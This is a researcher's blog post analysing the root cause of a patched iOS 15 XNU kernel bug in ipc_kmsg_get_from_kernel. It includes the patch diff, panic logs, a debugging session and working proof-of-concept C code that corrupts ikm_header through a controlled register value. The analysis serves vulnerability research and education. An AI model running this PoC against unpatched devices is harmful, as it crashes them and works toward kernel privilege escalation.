ipc_kmsg_vuln_blogpost

ipc_kmsg_get_from_kernel, iOS 15.4 - root cause analysis

This blogpost is about an old (and very interesting) vulnerability in XNU, introduced in iOS 15.0 beta and patched in iOS 15.4. I thought it might be nice to look into it, write an organized summary of the technical details, and show how this could be used to gain powerful exploitation primitives.

The goal of this blogpost is not to build an exploit; it’s to spread knowledge and help researchers better understand the fundamentals of this interesting vulnerability.

All the tests and examples in this blogpost are on virtual iPhone 13, iOS 15.3.1 (19D52), Corellium.

The vulnerability

History and credits

First of all, let’s start with some history and credits. On March 16 2022, John Åkerblom twitted the following tweet:

“iOS 15.4 fixes a kernel vulnerability introduced in iOS 15.0 beta that causes corruption of ipc_kmsgs leading to powerful primitives that can be used for local privilege escalation from WebContent and app sandbox”

Then, Synacktiv quoted that tweet with a tweetable POC:

“The PoC is even tweetable ;) void C(void a){thread_set_exception_ports(mach_thread_self(),EXC_MASK_ALL,(int )a,2,6);__builtin_trap();return a;} int main(){int p=mk_timer_create();mach_port_insert_right(mach_task_self(),p,p,20);pthread_t t;pthread_create(&t,0,C,&p);for(;;);}”

Awesome, we have a POC. Let’s dig in and see the vulnerable function and understand the root cause of the vulnerability. Finding the vulnerable function is easy - mostly because people already explicitly revealed that on Twitter:

Brightiup tweeted the following comment as a response to John Åkerblom.

“ipc_kmsg_get_from_kernel()?”
We have a POC, which we can run, panic a vulnerable device, and analyze the crash.

Ok great, so we know the vulnerability is in the function ipc_kmsg_get_from_kernel in osfmk/ipc/ipc_kmsg.c.

The patch

We can bindiff the patch, but since it’s in the opensource part of the kernel, let’s just see the relevant commit in apple-oss-distributions/xnu. This is the commit that fixes the vulnerability, and here is the relevant patch:

@@ -2036,7 +2042,7 @@ ipc_kmsg_get_from_user(
 mach_msg_return_t
 ipc_kmsg_get_from_kernel(
        mach_msg_header_t       *msg,
-       mach_msg_size_t         size,
+       mach_msg_size_t         size, /* can be larger than prealloc space */
        ipc_kmsg_t              *kmsgp)
 {
        ipc_kmsg_t      kmsg;
@@ -2064,6 +2070,11 @@ ipc_kmsg_get_from_kernel(
                        ip_mq_unlock(dest_port);
                        return MACH_SEND_NO_BUFFER;
                }
+               assert(kmsg->ikm_size == IKM_SAVED_MSG_SIZE);
+               if (size + MAX_TRAILER_SIZE > kmsg->ikm_size) {
+                       ip_mq_unlock(dest_port);
+                       return MACH_SEND_TOO_LARGE;
+               }
                ikm_prealloc_set_inuse(kmsg, dest_port);
                ikm_set_header(kmsg, NULL, size);
                ip_mq_unlock(dest_port);
@@ -2402,6 +2413,17 @@ ipc_kmsg_put_to_user(
                __unreachable_ok_pop
        }

Wow, very straightforward. We have a new check for a case where the size argument is too large, and even a comment that says “can be larger than prealloc space”. It’s pretty clear what the root cause of the vulnerability is now: it’s possible to get to ipc_kmsg_get_from_kernel with a pre-allocated kmsg, with a smaller size than the size argument. This results in a heap OOB write.

Cool, let’s get to the POC - understand it, execute it, and analyze the panic.

Analyzing the panic

POC high-level overview

Let’s start with the POC:

void *C(void* a){thread_set_exception_ports(mach_thread_self(),EXC_MASK_ALL,*(int *)a,2,6);__builtin_trap();return a;}
int main(){int p=mk_timer_create();mach_port_insert_right(mach_task_self(),p,p,20);pthread_t t;pthread_create(&t,0,C,&p);for(;;);}

I would like to refactor it a bit - use enums/definitions instead of constants, etc.:

void *trigger_breakpoint(void* arg) {
    thread_set_exception_ports(mach_thread_self(),
                                    EXC_MASK_ALL,
                                    *(int *)arg,
                                    EXCEPTION_STATE,
                                    ARM_THREAD_STATE64);
    __builtin_trap();
    return arg;
}

void trigger_corruption(void) {
    pthread_t t;
    int p = mk_timer_create();
    
    mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
    pthread_create(&t, 0, trigger_breakpoint, &p);
    for(;;);
}

void poc(void) {
    printf("trigger\n");
    trigger_corruption();
}

The POC does the following:

Calls mk_timer_create, which returns mach_port_name_t for a new mktimer.
Adds to the self talk the right MACH_MSG_TYPE_MAKE_SEND.
Sets the thread’s exception port with:
- new_mask== EXC_MASK_ALL
- new_port == the mktimer’s
- new_behavior== EXCEPTION_STATE
- new_flavor== ARM_THREAD_STATE64
Raise a breakpoint (EXC_BREAKPOINT).

I expected to see mktimer here; that’s the only kind of port making use of the preallocated kmsg facility in XNU (osfmk/kern/mk_timer.c):

	/* Pre-allocate a kmsg for the timer messages */
	kmsg = ipc_kmsg_alloc(sizeof(mk_timer_expire_msg_t), 0,
	    IPC_KMSG_ALLOC_KERNEL | IPC_KMSG_ALLOC_ZERO |
	    IPC_KMSG_ALLOC_SAVED | IPC_KMSG_ALLOC_NOFAIL);

XNU actually has an explicit comment on that in mach_port_allocate_full (osfmk/ipc/mach_port.c):

...
	/*
	 * Don't actually honor prealloc requests anymore,
	 * (only mk_timer still uses IP_PREALLOC messages, by hand).
	 *
	 * (for security reasons, and because it isn't guaranteed anyway).
	 * Keep old errors for legacy reasons.
	 */
	if (qosp->prealloc) {
...

Indeed, it seems like in the opensource XNU, prealloc messages are restricted to mktimers. Therefore, we probably are going to pre-allocate a kmsg for a mktimer, and then get to ipc_kmsg_get_from_kernel with size bigger than that.

However, before we get our hands dirty, let’s discuss exception ports :)

Exception ports

I don’t like repeating stuff that is highly documented and common knowledge. There are many sources covering exception ports online. For example, an outstanding source of knowledge for that is the great blogpost by Ian Beer - Exception-oriented exploitation on iOS (April 2017). However, I would briefly mention the necessary details to give everyone a high-level baseline for the flow that happens when we trigger the bug.

Copy-paste from Ian’s fantastic blogpost:

“When a thread faults (for example by accessing unallocated memory or calling a software breakpoint instruction) the kernel will send an exception message to the thread’s registered exception handler port.

If a thread doesn’t have an exception handler port the kernel will try to send the message to the task’s exception handler port and if that also fails the exception message will be delivered to to global host exception port. A thread can normally set its own exception port but setting the host exception port is a privileged action.”

And this is exactly where thread_set_exception_ports comes to play here. It lets our thread to set its own exception port, with the following arguments:

exception_mask - lets us restrict the types of exceptions we want to handle.
behavior - defines what type of exception message we want to receive.
flavour - lets us specify what kind of process state we want to be included in the message.

Now we can understand the meaning of the thread_set_exception_ports call. We are setting our thread’s exception ports to handle all possible exceptions (EXC_MASK_ALL). Below, you can see the meaning of these constants:

# define EXCEPTION_STATE                2
/*	Send a catch_exception_raise_state message including the
 *	thread state.
 */

/*
 *  Flavors
 */

...
#define ARM_THREAD_STATE64       6
...

This means that upon exception, the kernel will send a catch_exception_raise_state message including the thread state. Funny enough, Ian had this exact example in his blog:

“Passing an exception_mask of EXC_MASK_ALL, EXCEPTION_STATE for behavior and ARM_THREAD_STATE64 for new_flavor means that the kernel will send an exception_raise_state message to the exception port we specify whenever the specified thread faults. That message will contain the state of all the ARM64 general purposes registers, and that’s what we’ll use to get controlled data written off the end of the ipc_kmsg buffer!”

Great, now we are all on the same page regarding what the POC does. Obviously, the vulnerability we are talking about in this blogpost didn’t exist when Ian published his blogpost. However, and this is where the funny part begins - we are going to use the same primitive Ian used in his research for controlled data - the GPRs from our userspace thread’s state.

Finally, we can get to work.

Run the POC

Execute the POC gives us the following panic:

panic(cpu 5 caller 0xfffffff00833fec0): Kernel data abort. at pc 0xfffffff007bd0174, lr 0xfffffff007bd0168 (saved state: 0xffffffeb145ea460)
          x0:  0xffffffe21ad5da68 x1:  0xffffffe4cd2ec130  x2:  0xfffffffffffffff8  x3:  0xffffffe21ad5db78
          x4:  0x0000000000000000 x5:  0x0000000000000018  x6:  0x004dfd0000000001  x7:  0xffffffeb145ea920
          x8:  0x0000000000000000 x9:  0x0000000000000000  x10: 0x000000016f9aefc0  x11: 0x00000001004dfd00
          x12: 0x00000001004dfd00 x13: 0x000000016f9aefb0  x14: 0x00000001004dfd00  x15: 0x0000000160001000
          x16: 0x0000000000000000 x17: 0x1a35ffe218f92eb8  x18: 0x0000000000000000  x19: 0xffffffeb145ea818
          x20: 0x0000000000000150 x21: 0xffffffe4cd2ec000  x22: 0xffffffe21ad5db00  x23: 0x0000000000000000
          x24: 0x3ca5ffe21ad5db18 x25: 0x0000000000000000  x26: 0xffffffe4cd2ec000  x27: 0x0000000000000118
          x28: 0x0000000000000008 fp:  0xffffffeb145ea7f0  lr:  0xfffffff007bd0168  sp:  0xffffffeb145ea7b0
          pc:  0xfffffff007bd0174 cpsr: 0x80401204         esr: 0x96000046          far: 0x0000000000000004

Debugger message: panic
Device: D17
Hardware Model: iPhone14,5
ECID: E651D22C28B68544
Boot args: -v debug=0x14e serial=3 gpu=0 ioasm_behavior=0 -vm_compressor_wk_sw agm-genuine=1 agm-authentic=1 agm-trusted=1
Memory ID: 0x0
OS release type: User
OS version: 19D52

And the faulting instruction is 0xFFFFFFF007BD0174:

FFFFFFF007BD015C loc_FFFFFFF007BD015C    
FFFFFFF007BD015C                 MOV             W2, W20 ; size_t
FFFFFFF007BD0160                 MOV             X1, X21 ; void *
FFFFFFF007BD0164 ; memcpy(kmsg->ikm_header, msg, size);
FFFFFFF007BD0164                 BL              _memmove
FFFFFFF007BD0168                 MOV             W23, #0
FFFFFFF007BD016C                 LDR             X16, [X22,#0x18]
FFFFFFF007BD0170                 AUTDA           X16, X24
FFFFFFF007BD0174 ; kmsg->ikm_header->msgh_size = size;
FFFFFFF007BD0174                 STR             W20, [X16,#4]
FFFFFFF007BD0178 ; *kmsgp = kmsg;
FFFFFFF007BD0178                 STR             X22, [X19]

And this is the whole ipc_kmsg_get_from_kernel function (without the patch):

/*
 *	Routine:	ipc_kmsg_get_from_kernel
 *	Purpose:
 *		First checks for a preallocated message
 *		reserved for kernel clients.  If not found or size is too large -
 *		allocates a new kernel message buffer.
 *		Copies a kernel message to the message buffer.
 *		Only resource errors are allowed.
 *	Conditions:
 *		Nothing locked.
 *		Ports in header are ipc_port_t.
 *	Returns:
 *		MACH_MSG_SUCCESS	Acquired a message buffer.
 *		MACH_SEND_NO_BUFFER	Couldn't allocate a message buffer.
 */

mach_msg_return_t
ipc_kmsg_get_from_kernel(
	mach_msg_header_t       *msg,
	mach_msg_size_t         size,
	ipc_kmsg_t              *kmsgp)
{
	ipc_kmsg_t      kmsg;
	ipc_port_t      dest_port;

	assert(size >= sizeof(mach_msg_header_t));
	assert((size & 3) == 0);

	dest_port = msg->msgh_remote_port;

	/*
	 * See if the port has a pre-allocated kmsg for kernel
	 * clients.  These are set up for those kernel clients
	 * which cannot afford to wait.
	 */
	if (IP_VALID(dest_port) && IP_PREALLOC(dest_port)) {
		ip_mq_lock(dest_port);
		if (!ip_active(dest_port)) {
			ip_mq_unlock(dest_port);
			return MACH_SEND_NO_BUFFER;
		}
		assert(IP_PREALLOC(dest_port));
		kmsg = dest_port->ip_premsg;
		if (ikm_prealloc_inuse(kmsg)) {
			ip_mq_unlock(dest_port);
			return MACH_SEND_NO_BUFFER;
		}
		ikm_prealloc_set_inuse(kmsg, dest_port);
		ikm_set_header(kmsg, NULL, size);
		ip_mq_unlock(dest_port);
	} else {
		kmsg = ipc_kmsg_alloc(size, 0, IPC_KMSG_ALLOC_KERNEL);
		if (kmsg == IKM_NULL) {
			return MACH_SEND_NO_BUFFER;
		}
	}

	memcpy(kmsg->ikm_header, msg, size);
	kmsg->ikm_header->msgh_size = size;

	*kmsgp = kmsg;
	return MACH_MSG_SUCCESS;
}

So, Synacktiv’s POC crashes on a NULL-dereference: the write kmsg->ikm_header->msgh_size = size, but obviously this isn’t the root cause! Note the order of operations here:

copy size bytes from msg to kmsg->ikm_header
write size to kmsg->ikm_header->msgh_size

The memcpy is successful, while the store operation later fails on NULL-dereference. The explanation is simple - the memcpy goes out-of-bounds and corrupts kmsg->ikm_header with zeros.

The reason the POC works 100% deterministically, is because ikm_header is not a separate allocation on the heap - it’s inside the structure. Let’s see this in details. First, this is ipc_kmsg:

struct ipc_kmsg {
	struct ipc_kmsg            *ikm_next;        /* next message on port/discard queue */
	struct ipc_kmsg            *ikm_prev;        /* prev message on port/discard queue */
	union {
		ipc_port_t XNU_PTRAUTH_SIGNED_PTR("kmsg.ikm_prealloc") ikm_prealloc; /* port we were preallocated from */
		void      *XNU_PTRAUTH_SIGNED_PTR("kmsg.ikm_data")     ikm_data;
	};
	mach_msg_header_t          *XNU_PTRAUTH_SIGNED_PTR("kmsg.ikm_header") ikm_header;
	ipc_port_t                 XNU_PTRAUTH_SIGNED_PTR("kmsg.ikm_voucher_port") ikm_voucher_port;   /* voucher port carried */
	struct ipc_importance_elem *ikm_importance;  /* inherited from */
	queue_chain_t              ikm_inheritance;  /* inherited from link */
	struct turnstile           *ikm_turnstile;   /* send turnstile for ikm_prealloc port */
#if MACH_FLIPC
	struct mach_node           *ikm_node;        /* Originating node - needed for ack */
#endif
	mach_msg_size_t            ikm_size;
	uint32_t                   ikm_ppriority;    /* pthread priority of this kmsg */
#if IKM_PARTIAL_SIG
	uintptr_t                  ikm_header_sig;   /* sig for just the header */
	uintptr_t                  ikm_headtrail_sig;/* sif for header and trailer */
#endif
	uintptr_t                  ikm_signature;    /* sig for all kernel-processed data */
	ipc_object_copyin_flags_t  ikm_flags;
	mach_msg_qos_t             ikm_qos_override; /* qos override on this kmsg */
	mach_msg_type_name_t       ikm_voucher_type : 8; /* disposition type the voucher came in with */

	uint8_t                    ikm_inline_data[] __attribute__((aligned(4)));
};

The ikm_header field is set by ikm_set_header:

/*
 *	Routine:	ikm_set_header
 *	Purpose:
 *		Set the header (and data) pointers for a message. If the
 *		message is small, the data pointer is NULL and all the
 *		data resides within the fixed
 *		the cache, that is best.  Otherwise, allocate a new one.
 *	Conditions:
 *		Nothing locked.
 */
static void
ikm_set_header(
	ipc_kmsg_t kmsg,
	void *data,
	mach_msg_size_t size)
{
	mach_msg_size_t mtsize = size + MAX_TRAILER_SIZE;
	if (data) {
		kmsg->ikm_data = data;
		kmsg->ikm_header = (mach_msg_header_t *)((uintptr_t)data + kmsg->ikm_size - mtsize);
	} else {
		assert(kmsg->ikm_size == IKM_SAVED_MSG_SIZE);
		kmsg->ikm_header = (mach_msg_header_t *)(vm_offset_t)
		    (kmsg->ikm_inline_data + kmsg->ikm_size - mtsize);
	}
}

If the data argument is NULL (our case), ikm_header is set to point to the ikm_inline_data inside the kmsg allocation.

Also, in our case, the size argument is too big (possible due to the missing check), which means ikm_header goes backward and points before its offset in the structure!

The ipc_kmsg structure looks as follows:

--------------------------------------------------
|  struct ipc_kmsg  ;      ikm_inline_data       |
--------------------------------------------------

In our case, the layout is as follows:

    ----------------------------------------------
    |  "underflowed" pointer ikm_header          |
    |                                            |
    v                                            |
--------------------------------------------------
|  struct ipc_kmsg  ;   ...    ; prealloc       |
--------------------------------------------------
         |                      ^
         | correct ikm_header   |
         ------------------------

The important trick

Note that because the mktimer port is (also) a message queue, we can trick it into being the right that receives messages from other things - such as exceptions. In this POC, Synacktiv used exceptions - which is fantastic. With exceptions, we control the thread’s state, meaning we get controlled content from userspace. However, there are other things the kernel could send to an mqueue, and their size could be controlled. These games could maybe let us overflow backward into a previous message, and expand the set of primitives we have.

“Demo” - let’s debug it

We can easily verify this using Corellium and a kernel debugger. The function ipc_kmsg_get_from_kernel is triggered quite a lot, so let’s set a breakpoint on handle_breakpoint (osfmk/arm64/sleh.c), and only when we hit it, set a breakpoint on ipc_kmsg_get_from_kernel.

First of all, set a breakpoint on handle_breakpoint:

(lldb) breakpoint set -a 0xFFFFFFF007D3411C
Breakpoint 1: address = 0xfffffff007d3411c
(lldb) c
Process 1 resuming
Process 1 stopped
* thread #6, stop reason = breakpoint 1.1
    frame #0: 0xfffffff007d3411c
->  0xfffffff007d3411c: sub    sp, sp, #0x20
    0xfffffff007d34120: stp    x29, x30, [sp, #0x10]
    0xfffffff007d34124: add    x29, sp, #0x10
    0xfffffff007d34128: adrp   x8, -3369
Target 0: (No executable module.) stopped.

Now, set a breakpoint on the memcpy and the load in ipc_kmsg_get_from_kernel:

FFFFFFF007BD0164 ; memcpy(kmsg->ikm_header, msg, size);
FFFFFFF007BD0164                 BL              _memmove
FFFFFFF007BD0168                 MOV             W23, #0
FFFFFFF007BD016C                 LDR             X16, [X22,#0x18]
FFFFFFF007BD0170                 AUTDA           X16, X24
FFFFFFF007BD0174 ; kmsg->ikm_header->msgh_size = size;
FFFFFFF007BD0174                 STR             W20, [X16,#4]
FFFFFFF007BD0178 ; *kmsgp = kmsg;
FFFFFFF007BD0178                 STR             X22, [X19]

So 0xFFFFFFF007BD0164 and 0xFFFFFFF007BD016C:

(lldb) breakpoint set -a 0xFFFFFFF007BD0164
Breakpoint 2: address = 0xfffffff007bd0164
(lldb) breakpoint set -a 0xFFFFFFF007BD016C
Breakpoint 3: address = 0xfffffff007bd016c
(lldb) c
Process 1 resuming
Process 1 stopped
* thread #6, stop reason = breakpoint 2.1
    frame #0: 0xfffffff007bd0164
->  0xfffffff007bd0164: bl     -0xff634e7f0
    0xfffffff007bd0168: mov    w23, #0x0
    0xfffffff007bd016c: ldr    x16, [x22, #0x18]
    0xfffffff007bd0170: nop    
Target 0: (No executable module.) stopped.
(lldb) reg read x0
      x0 = 0xffffffe4ccd3e768
(lldb) reg read x2
      x2 = 0x0000000000000150
(lldb) reg read x22
     x22 = 0xffffffe4ccd3e800
(lldb) x/8gx $x22
0xffffffe4ccd3e800: 0x0000000000000000 0x0000000000000000
0xffffffe4ccd3e810: 0xffffffe2fee3ae40 0xffffffe4ccd3e768
0xffffffe4ccd3e820: 0x0000000000000000 0x0000000000000000
0xffffffe4ccd3e830: 0x0000000000000000 0x0000000000000000
(lldb) c
Process 1 resuming
Process 1 stopped
* thread #6, stop reason = breakpoint 3.1
    frame #0: 0xfffffff007bd016c
->  0xfffffff007bd016c: ldr    x16, [x22, #0x18]
    0xfffffff007bd0170: nop    
    0xfffffff007bd0174: str    w20, [x16, #0x4]
    0xfffffff007bd0178: str    x22, [x19]
Target 0: (No executable module.) stopped.
(lldb) x/8gx $x22
0xffffffe4ccd3e800: 0x0000000000000000 0x0000000000000000
0xffffffe4ccd3e810: 0x0000000000000000 0x0000000000000000
0xffffffe4ccd3e820: 0x0000000000000000 0xffffffffffffffe1
0xffffffe4ccd3e830: 0x000000016f06f000 0x0000000000000000
(lldb) 

Yes! Indeed, we can see that the dst of the memcpy is right before x22, which is kmsg (offset 0x18 is ikm_header).

Arbitrary write

As we all know, the rule of life is “arbitrary r/w –> game over”.

Even though arbitrary write alone doesn’t help (we need to know where the things we would like to corrupt), let’s do that. As in any OOB write primitive, we need to ask ourselves a couple of questions:

Can we control the length of the corruption?
Can we control the content of the corruption?

The good news is that we control the content of the corruption. Keep in mind the message sent here is from the kernel - specifically, as a response to a software breakpoint (we trigger the handle_breakpoint kernel function). And since we called thread_set_exception_ports with new_behavior== EXCEPTION_STATE and new_flavor== ARM_THREAD_STATE64, the message contains the thread’s state - which we can control it from userspace!

Regarding the length of the corruption: in the case of EXCEPTION_STATE and ARM_THREAD_STATE64 we do not control the length; however, as I said before - there are other things the kernel could send to an mqueue, and their size could be controlled. Again, keep in mind that size plays here two roles:

It’s the length of the memcpy.
It’s used in the pointer arithmetic, which means it determines how much we go backward in memory and start our corruption.

Anyways, we will keep our technique of using the thread’s state to control the content. So, we do not control the length.

Turning this into an arbitrary write is simple: If we can control the value at *(x22+0x18), we immediately get an arbitrary write of 4 bytes - we write w20, which is size - to the address we corrupted (note that size is mach_msg_size_t, which is natural_t, which is uint32_t). Which means we have only partial control over the value we are writing. In other words - you can consider this as a write-what-where of 32-bit value, while the:

“what” is partially controlled and restricted.
“where” is fully controlled.

Let’s do that. we can dive into the code and see exactly how the thread state is sent. This is pretty straightforward, but we can do something even simpler - let’s try to set registers values before triggering the breakpoint, and see how it affects the message.

So, let’s modify our trigger_breakpoint function as follows:

void *trigger_breakpoint(void* arg) {
    thread_set_exception_ports(mach_thread_self(),
                                    EXC_MASK_ALL,
                                    *(int *)arg,
                                    EXCEPTION_STATE,
                                    ARM_THREAD_STATE64);
    
    uint64_t val = 0x4141414141414141;
    asm volatile ("mov x0, %0" : "+r"(val) );
    asm volatile ("mov x1, %0" : "+r"(val) );
    asm volatile ("mov x2, %0" : "+r"(val) );
    asm volatile ("mov x3, %0" : "+r"(val) );
    asm volatile ("mov x4, %0" : "+r"(val) );
    asm volatile ("mov x5, %0" : "+r"(val) );
    asm volatile ("mov x6, %0" : "+r"(val) );
    asm volatile ("mov x7, %0" : "+r"(val) );
    asm volatile ("mov x8, %0" : "+r"(val) );
    asm volatile ("mov x9, %0" : "+r"(val) );
    asm volatile ("mov x10, %0" : "+r"(val) );
    asm volatile ("mov x11, %0" : "+r"(val) );
    asm volatile ("mov x12, %0" : "+r"(val) );
    asm volatile ("mov x13, %0" : "+r"(val) );
    asm volatile ("mov x14, %0" : "+r"(val) );
    
    __builtin_trap();
    return arg;
}

And let’s run our POC and view the new panic:

panic(cpu 4 caller 0xfffffff00833fec0): Kernel data abort. at pc 0xfffffff007bd0174, lr 0xfffffff007bd0168 (saved state: 0xffffffeb14962460)
          x0:  0xffffffe303acf968 x1:  0xffffffe60025a130  x2:  0xfffffffffffffff8  x3:  0xffffffe303acfa78
          x4:  0x0000000000000000 x5:  0x0000000000000018  x6:  0x0263fd0000000001  x7:  0xffffffeb14962920
          x8:  0x0000000000000000 x9:  0x0000000000000000  x10: 0x000000016d84efc0  x11: 0x000000010263fcb4
          x12: 0x000000010263fcb4 x13: 0x000000016d84efb0  x14: 0x000000010263fd00  x15: 0x0000000160001000
          x16: 0x4141414141414141 x17: 0x1a35ffe3e8ce81b8  x18: 0x0000000000000000  x19: 0xffffffeb14962818
          x20: 0x0000000000000150 x21: 0xffffffe60025a000  x22: 0xffffffe303acfa00  x23: 0x0000000000000000
          x24: 0x3ca5ffe303acfa18 x25: 0x0000000000000000  x26: 0xffffffe60025a000  x27: 0x0000000000000118
          x28: 0x0000000000000008 fp:  0xffffffeb149627f0  lr:  0xfffffff007bd0168  sp:  0xffffffeb149627b0
          pc:  0xfffffff007bd0174 cpsr: 0x80401204         esr: 0x96000044          far: 0x4141414141414145

Debugger message: panic
Device: D17
Hardware Model: iPhone14,5
ECID: E651D22C28B68544
Boot args: -v debug=0x14e serial=3 gpu=0 ioasm_behavior=0 -vm_compressor_wk_sw agm-genuine=1 agm-authentic=1 agm-trusted=1
Memory ID: 0x0
OS release type: User
OS version: 19D52
Kernel version: Darwin Kernel Version 21.3.0: Wed Jan  5 21:44:44 PST 2022; root:xnu-8019.80.24~23/RELEASE_ARM64_T8110
Kernel UUID: 46EEBD0C-44C8-3A46-A020-57125FE05425

The kernel crashes on the very same instruction (pc==0xfffffff007bd0174), which is str w20, [x16, #0x4]. However, this time, x16==0x4141414141414141 . Great!

Edit: ikm_header is PAC’d

I forgot to mention that: as you can see from the above code, ikm_header is PAC’d (thanks John Åkerblom for respectfully bringing this up :))! Of course, it means this “arbitrary write” is not possible without bypassing PAC. This is a great example of Apple’s great work with dataPAC!

As I said at the very beginning, this short blogpost’s goal is root cause analysis, not writing exploit - so it doesn’t matter. I only used here ikm_header as proof we corrupted ipc_kmsg.

Now, when you create a virtual device on Corellium, it runs with PAC disabled by default (it’s faster). Corellium offers PAC simulation (which works great, by the way) in “Settings/General” in their product, with the following note:

“You can simulate the behavior of PAC instructions in mobile processors. With this turned off, PAC will not be added or authenticated on any pointers. Enabling PAC will impact the performance of the device.”

You can clearly see our virtual device runs with PAC disabled because x16 is 0x4141414141414141, while the code (copy/pasted from above) is:

FFFFFFF007BD016C                 LDR             X16, [X22,#0x18]
FFFFFFF007BD0170                 AUTDA           X16, X24
FFFFFFF007BD0174 ; kmsg->ikm_header->msgh_size = size;
FFFFFFF007BD0174                 STR             W20, [X16,#4]

The AUTDA should corrupt the MSBs of our register (since the signature is clearly incorrect). If you enable PAC and re-run our POC, the very same POC crashes on the very same instruction, with the following register state:

panic(cpu 5 caller 0xfffffff00833fec0): Kernel data abort. at pc 0xfffffff007bd0174, lr 0xfffffff007bd0168 (saved state: 0xffffffeb14a82460)
          x0:  0xffffffe301879568 x1:  0xffffffe4cd3aa130  x2:  0xfffffffffffffff8  x3:  0xffffffe301879678
          x4:  0x0000000000000000 x5:  0x0000000000000018  x6:  0x00e89eb000000001  x7:  0xffffffeb14a82920
          x8:  0x0000000000000000 x9:  0x0000000000000000  x10: 0x000000016f002fc0  x11: 0x006ef30100e89e90
          x12: 0x006ef30100e89e90 x13: 0x000000016f002fb0  x14: 0x0000000100e89eb0  x15: 0x0000000160001000
          x16: 0x0020004141414141 x17: 0x1a35ffe4cbc867d8  x18: 0x0000000000000000  x19: 0xffffffeb14a82818
          x20: 0x0000000000000150 x21: 0xffffffe4cd3aa000  x22: 0xffffffe301879600  x23: 0x0000000000000000
          x24: 0x3ca5ffe301879618 x25: 0x0000000000000000  x26: 0xffffffe4cd3aa000  x27: 0x0000000000000118
          x28: 0x0000000000000008 fp:  0xffffffeb14a827f0  lr:  0xfffffff007bd0168  sp:  0xffffffeb14a827b0
          pc:  0xfffffff007bd0174 cpsr: 0x80401204         esr: 0x96000044          far: 0x0020004141414145

Indeed, due to AUTDA, x16== 0x0020004141414141.

Note that this ipc_kmsg corruption is done in a 100% deterministic way - there is no heap shaping, no race to win, etc.. This part simply cannot fail.

structs

Of course, the proper way to do this is to see the structures copied into the kmsg. You can view all the structures and their layouts in the source. For instance, let’s see the ARM_THREAD_STATE64.

Let’s start with see arm_thread_state64 in osfmk/mach/arm_structs.h:

/*
 * Maps state flavor to number of words in the state:
 */
/* __private_extern__ */
unsigned int _MachineStateCount[] = {
	[ARM_UNIFIED_THREAD_STATE] = ARM_UNIFIED_THREAD_STATE_COUNT,
	[ARM_VFP_STATE] = ARM_VFP_STATE_COUNT,
	[ARM_EXCEPTION_STATE] = ARM_EXCEPTION_STATE_COUNT,
	[ARM_DEBUG_STATE] = ARM_DEBUG_STATE_COUNT,
	[ARM_THREAD_STATE64] = ARM_THREAD_STATE64_COUNT,
	[ARM_EXCEPTION_STATE64] = ARM_EXCEPTION_STATE64_COUNT,
...
};

Ok, let’s see ARM_THREAD_STATE64_COUNT:

#define ARM_THREAD_STATE64_COUNT ((mach_msg_type_number_t) \
	(sizeof (arm_thread_state64_t)/sizeof(uint32_t)))

And arm_thread_state64_t:

typedef _STRUCT_ARM_THREAD_STATE64 arm_thread_state64_t;

Finally:

#define _STRUCT_ARM_THREAD_STATE64      struct arm_thread_state64
_STRUCT_ARM_THREAD_STATE64
{
	__uint64_t    x[29];    /* General purpose registers x0-x28 */
	__uint64_t    fp;               /* Frame pointer x29 */
	__uint64_t    lr;               /* Link register x30 */
	__uint64_t    sp;               /* Stack pointer x31 */
	__uint64_t    pc;               /* Program counter */
	__uint32_t    cpsr;             /* Current program status register */
	__uint32_t    flags;    /* Flags describing structure format */
};

Exactly what we expected to see :)

POC - ikm_header corruption

The value that corrupts ikm_header is x14. Therefore, the poc for arbitrary write (of size==0x150) is as follows:

void *trigger_breakpoint(void* arg) {
    thread_set_exception_ports(mach_thread_self(),
                                    EXC_MASK_ALL,
                                    *(int *)arg,
                                    EXCEPTION_STATE,
                                    ARM_THREAD_STATE64);

    /* ikm_header is set by the value of x14*/
    uint64_t val = 0x4141414141414141;
    asm volatile ("mov x14, %0" : "+r"(val) );

    __builtin_trap();
    return arg;
}

void trigger_corruption(void) {
    pthread_t t;
    int p = mk_timer_create();

    mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
    pthread_create(&t, 0, trigger_breakpoint, &p);
    for(;;);
}

void poc(void) {
    printf("trigger\n");
    trigger_corruption();
}

What’s next?

Even with a PAC bypass or another arbitrary write that does not require a PAC bypass, there is much work to do. Without the ability to read kernel memory, the arbitrary write alone won’t help us. We need to build relative/arbitrary read primitives and read some pointers, etc.. However, as I’ve said at the beginning, that’s not part of this blogpost’s goals :)

I hope you enjoyed this blogpost.

Thanks,

Saar Amar